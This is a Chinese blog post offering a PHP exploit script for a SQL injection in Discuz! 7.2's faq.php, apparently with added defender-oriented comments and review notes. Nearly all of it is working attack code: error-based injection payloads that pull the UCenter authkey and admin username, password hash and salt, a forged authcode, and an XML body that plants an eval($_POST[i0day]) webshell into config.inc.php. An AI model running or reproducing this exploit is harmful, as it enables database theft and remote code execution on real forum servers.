Discuz! 7.2 SQL注入exp

已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。

参数:
1.可直接getshell
2.爆管理账号密码
3.爆表前缀
如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。

下载地址:DZ7.2
附代码:

<?php
 
/**
  * @author: xiaoma
  * @blog  : www.i0day.com
  * @date  : 2014.7.2 23:1
  */
 
// CLI entry point. argv[1] = target host, argv[2] = web path, argv[3] = mode selector ($js).
// error_reporting(0) hides every PHP notice/warning, including socket and regex failures below.
error_reporting (0);
set_time_limit(3000);
$host = $argv [1];
$path = $argv [2];
$js = $argv [3];
// 10 hours ahead of local time; embedded in the forged "time=" field passed to _authcode() in mode 1.
$timestamp = time()+10*3600;
// Table prefix; every injected subquery below concatenates it in front of the uc_* table names.
$table = "cdb_" ; // table prefix ("cdb_" by default)
 
// Usage banner when no arguments are given (note: $argc < 2 still lets a single-argument call through).
if ( $argc < 2) {
     print_r('
   ********************************************************
   *  Discuz faq.php SQL Injection Exp                    *
   *  ---------By:Www.i0day.com-----------               *
   *     Usage: php '.$argv[0].' url 1                    *
   *  -------------------------------------               *
   *  js选项: 1.GetShell 2.取密码 3.查表前缀              *
   *                                                      *
   *   php '.$argv[0].' Www.i0day.com / 1                    *
   *   php '.$argv[0].' Www.i0day.com /dz72/ 1               *
   *                                                      *
   *                                                      *
   ********************************************************
      ');
      exit ;
}
// Mode 1: the injected subquery rides in the gids[100][0] query-string parameter of faq.php
// (action=grouppermission) and the queried value is echoed back in the error page between the
// 0x3a3a ("::") marker bytes. For defenders, "faq.php?action=grouppermission&gids[" in access
// logs is the request shape shared by all three modes.
if ( $js ==1){
     // Step 1: read length(authkey) from <prefix>uc_applications.
     $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20" . $table . "uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
     $resp = sendpack( $host , $path , $sql );
 
     // NOTE(review): PHP's strpos() returns false, never -1, so this comparison is always false
     // and this branch is unreachable; the "!=-1" checks further down are always true. In practice
     // only the preg_match() results decide what gets printed.
     if ( strpos ( $resp , "::" )==-1){
         echo '表前缀可能不是默认cdb_ 请先查看表前缀!' ;
     } else {
     preg_match( "/::(.*)::/" , $resp , $matches );
     $lenght = intval ( $matches [1]);
     if ( $lenght ){
         // The key is fetched in two 62-character substr() slices below, so only lengths up to 124 are handled.
         if ( $lenght <=124){
             // Step 2a: substr(authkey, 1, 62); this time the marker byte is 0x5E ("^").
             $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,1,62)%20from%20" . $table . "uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
             $resp = sendpack( $host , $path , $sql );
             if ( strpos ( $resp , "1\^" )!=-1){
                 preg_match( "/1\^(.*)\'/U" , $resp , $key1 );
             // Step 2b: substr(authkey, 63, 62).
             $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,63,62)%20from%20" . $table . "uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
             $resp = sendpack( $host , $path , $sql );
             preg_match( "/1\^(.*)\'/U" , $resp , $key2 );
             $key = $key1 [1]. $key2 [1];
             // Step 3: forge the UCenter api/uc.php "code" parameter with the recovered key (see _authcode()).
             $code =urlencode(_authcode( "time=$timestamp&action=updateapps" , 'ENCODE' , $key ));
             // Two XML bodies POSTed by send(): the first carries the PHP the author wants stored in the
             // UC_API item, the second restores a plain value afterwards.
             $cmd1 ='<?xml version= "1.0" encoding= "ISO-8859-1" ?>
<root>
  <item id= "UC_API" >bbs.49you.com\'); eval ( $_POST [i0day]); //</item>
</root>';
             $cmd2 ='<?xml version= "1.0" encoding= "ISO-8859-1" ?>
<root>
  <item id= "UC_API" >bbs.49you.com</item>
</root>';
             $html1 = send( $cmd1 );
             // The last byte of each response is treated as the success flag ('1').
             $res1 = substr ( $html1 ,-1);
             $html2 = send( $cmd2 );
             // NOTE(review): reads $html1 again rather than $html2, so the second request is never actually checked.
             $res2 = substr ( $html1 ,-1);
             if ( $res1 == '1' && $res2 == '1' ){
             // Prints the location the author expects; nothing here verifies that the file was changed.
             echo "shell地址:http://" . $host . $path . 'config.inc.php   pass:i0day' ;
             }
             } else {
                 echo '获取失败' ;
             }
         }
     }
    }       
 
// Mode 2: same injection point; reads username:password:salt of the first <prefix>uc_members row,
// delimited by the 0x5E5E5E ("^^^") marker. The payload here is fully percent-encoded, unlike modes 1 and 3.
} elseif ( $js ==2){
     $sql = "action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5E5E5E,username,0x3a,password,0x3a,salt%29%20from%20" . $table . "uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5E%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23" ;
     $resp = sendpack( $host , $path , $sql );
     if ( strpos ( $resp , "\^\^\^" )!=-1){
         preg_match( "/\^\^\^(.*)\^/U" , $resp , $password );
         echo '密码:' . $password [1];
         } else {
             echo '表前缀可能不是默认cdb_ 请先查看表前缀!' ;
         }
// Mode 3: reads one table name (hex-encoded) from information_schema for the current database
// to discover the prefix; hex2str() turns it back into text for display.
} elseif ( $js ==3){
     $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5E)x%20from%20information_schema%20.tables%20group%20by%20x)a)%23" ;
     $resp = sendpack( $host , $path , $sql );
     if ( strpos ( $resp , "1\^" )!=-1){
         preg_match( "/1\^(.*)\^/U" , $resp , $t );
 
         // NOTE(review): $t[1] is still the hex form here, so the literal "cdb_" cannot occur in it;
         // together with the strpos()/-1 issue above, this branch is taken regardless of the actual prefix.
         if ( strpos ( $t [1], "cdb_" )!=-1){
             echo "表名为:" .hex2str( $t [1]). " 表前缀为默认cdb_ 无需修改" ;
         } else {
             echo "表名:" .hex2str( $t [1]). ' 不是默认表名cdb_请自行修改代码中的$table' ;
         }
     } else {
         echo "查看表前缀失败,Sorry" ;
     }
} else {
     echo "未选择脚本功能" ;
}
 
/**
 * Sends one hand-built HTTP/1.1 GET to http://$host:80$path/faq.php?$sql and
 * returns the full raw response (status line, headers and body) as a string.
 *
 * Detection notes for defenders: every caller targets
 * "faq.php?action=grouppermission&gids[...]", the Host header is written without
 * a space after the colon, and the User-Agent is the fixed Firefox 20 string
 * below -- three stable fingerprints for access-log review.
 *
 * @param string $host target host name; also used verbatim as the Host header value
 * @param string $path web root path; "/faq.php" is appended with no separator check
 * @param string $sql  pre-encoded query string carrying the injected SQL
 * @param mixed  $js   unused by the body (declared without a default)
 * @return string raw response; the function die()s instead of returning when the socket cannot be opened
 */
function sendpack( $host , $path , $sql , $js ){
        // When $path is "/" the request line becomes "GET //faq.php?...".
        $data = "GET " . $path . "/faq.php?" . $sql . " HTTP/1.1\r\n" ;
         // No space after "Host:" -- a minor protocol quirk worth matching on.
         $data .= "Host:" . $host . "\r\n" ;
         $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n" ;
         $data .= "Connection: close\r\n\r\n" ;
         //$data.=$html."\r\n";
         // Plain TCP on port 80 only; no TLS and no explicit timeout.
         $ock = fsockopen ( $host ,80);
 
         if (! $ock ){
         echo "No response from " . $host ;
         die ();
 
         }
         fwrite( $ock , $data );
 
         $resp = '' ;
 
         // "Connection: close" above is what lets feof() terminate this loop.
         while (! feof ( $ock )) {
 
                 $resp .= fread ( $ock , 1024);
                 }
 
         return $resp ;
 
}
/**
 * POSTs an XML body to http://$host:80$path/api/uc.php?code=$code and returns
 * the raw response as a string.
 *
 * Reads $host, $path and the forged $code from globals set by the main script.
 * Detection notes for defenders: the request line carries two spaces before
 * "HTTP/1.1", the Referer is the bare host name, and the User-Agent is the
 * fixed MSIE 6.00 string below.
 *
 * @param string $cmd request body (XML); its byte length becomes Content-Length
 * @return string raw response; '' when nothing could be read
 */
function send( $cmd ){
     global $host , $code , $path ;
     // Double space before "HTTP/1.1" is reproduced from the original.
     $message = "POST " . $path . "/api/uc.php?code=" . $code . "  HTTP/1.1\r\n" ;
     $message .= "Accept: */*\r\n" ;
     $message .= "Referer: " . $host . "\r\n" ;
     $message .= "Accept-Language: zh-cn\r\n" ;
     $message .= "Content-Type: application/x-www-form-urlencoded\r\n" ;
     $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n" ;
     $message .= "Host: " . $host . "\r\n" ;
     $message .= "Content-Length: " . strlen ( $cmd ). "\r\n" ;
     $message .= "Connection: Close\r\n\r\n" ;
     $message .= $cmd ;
 
     //var_dump($message);
     // NOTE(review): the fsockopen() result is not checked before fputs(); only the read loop guards on $fp.
     $fp = fsockopen ( $host , 80);
     fputs ( $fp , $message );
 
     $resp = '' ;
 
     while ( $fp && ! feof ( $fp ))
         $resp .= fread ( $fp , 1024);
 
     return $resp ;
}
 
/**
 * UCenter-style reversible "authcode": an RC4-like keystream whose key material
 * is derived from MD5 digests of the shared secret.
 *
 * ENCODE output layout: 4 characters of per-call salt, then the base64 (with
 * '=' padding stripped) of the keystream-XORed body. The body is
 * "<10-digit expiry or 0000000000><16-char md5 tag><plaintext>".
 * DECODE reverses this and returns '' when the expiry has passed or the tag
 * does not match.
 *
 * @param string $string    plaintext (ENCODE) or a previous ENCODE output (DECODE)
 * @param string $operation 'DECODE' (default); any other value means ENCODE
 * @param string $key       secret; falls back to the UC_KEY constant when empty
 * @param int    $expiry    lifetime in seconds for ENCODE; 0 = never expires
 * @return string
 */
function _authcode( $string , $operation = 'DECODE' , $key = '' , $expiry = 0) {
    $saltLen = 4;
    $decoding = ($operation == 'DECODE');

    // Key schedule: three MD5 digests derived from the shared secret.
    $master = md5($key ? $key : UC_KEY);
    $keyA = md5(substr($master, 0, 16));
    $keyB = md5(substr($master, 16, 16));

    // Per-message salt: read back from the input on DECODE, freshly generated on ENCODE.
    if ($decoding) {
        $salt = substr($string, 0, $saltLen);
    } else {
        $salt = substr(md5(microtime()), -$saltLen);
    }
    $stream = $keyA . md5($keyA . $salt);
    $streamLen = strlen($stream);

    // Body to be XORed: the encoded payload on DECODE, or expiry + tag + plaintext on ENCODE.
    if ($decoding) {
        $payload = base64_decode(substr($string, $saltLen));
    } else {
        $expiresAt = $expiry ? $expiry + time() : 0;
        $payload = sprintf('%010d', $expiresAt)
            . substr(md5($string . $keyB), 0, 16)
            . $string;
    }
    $payloadLen = strlen($payload);

    // Key-scheduling pass over a 256-entry permutation box.
    $box = range(0, 255);
    $j = 0;
    for ($i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + ord($stream[$i % $streamLen])) % 256;
        list($box[$i], $box[$j]) = [$box[$j], $box[$i]];
    }

    // Keystream generation, XORed against the payload byte by byte.
    $out = '';
    $a = 0;
    $j = 0;
    for ($i = 0; $i < $payloadLen; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        list($box[$a], $box[$j]) = [$box[$j], $box[$a]];
        $out .= chr(ord($payload[$i]) ^ $box[($box[$a] + $box[$j]) % 256]);
    }

    if (!$decoding) {
        return $salt . str_replace('=', '', base64_encode($out));
    }

    // DECODE: accept only when not expired (or no expiry set) and the tag verifies.
    $expiryField = substr($out, 0, 10);
    $notExpired = ($expiryField == 0 || $expiryField - time() > 0);
    $tagOk = substr($out, 10, 16) == substr(md5(substr($out, 26) . $keyB), 0, 16);
    return ($notExpired && $tagOk) ? substr($out, 26) : '';
}
/**
 * Decodes a hex string, two characters at a time, into raw bytes.
 *
 * Each 2-character chunk (the last may be a single character for odd-length
 * input) goes through hexdec() and chr(); no validation is performed.
 *
 * @param string $hex hexadecimal digits, e.g. '636462' => 'cdb'
 * @return string
 */
function hex2str( $hex ){
    $pairs = str_split($hex, 2);
    $bytes = array_map(
        function ($pair) {
            return chr(hexdec($pair));
        },
        $pairs
    );
    return implode('', $bytes);
}
?>

转载文章请注明,转载自:小马's Blog http://www.i0day.com

本文链接: http://www.i0day.com/1756.html
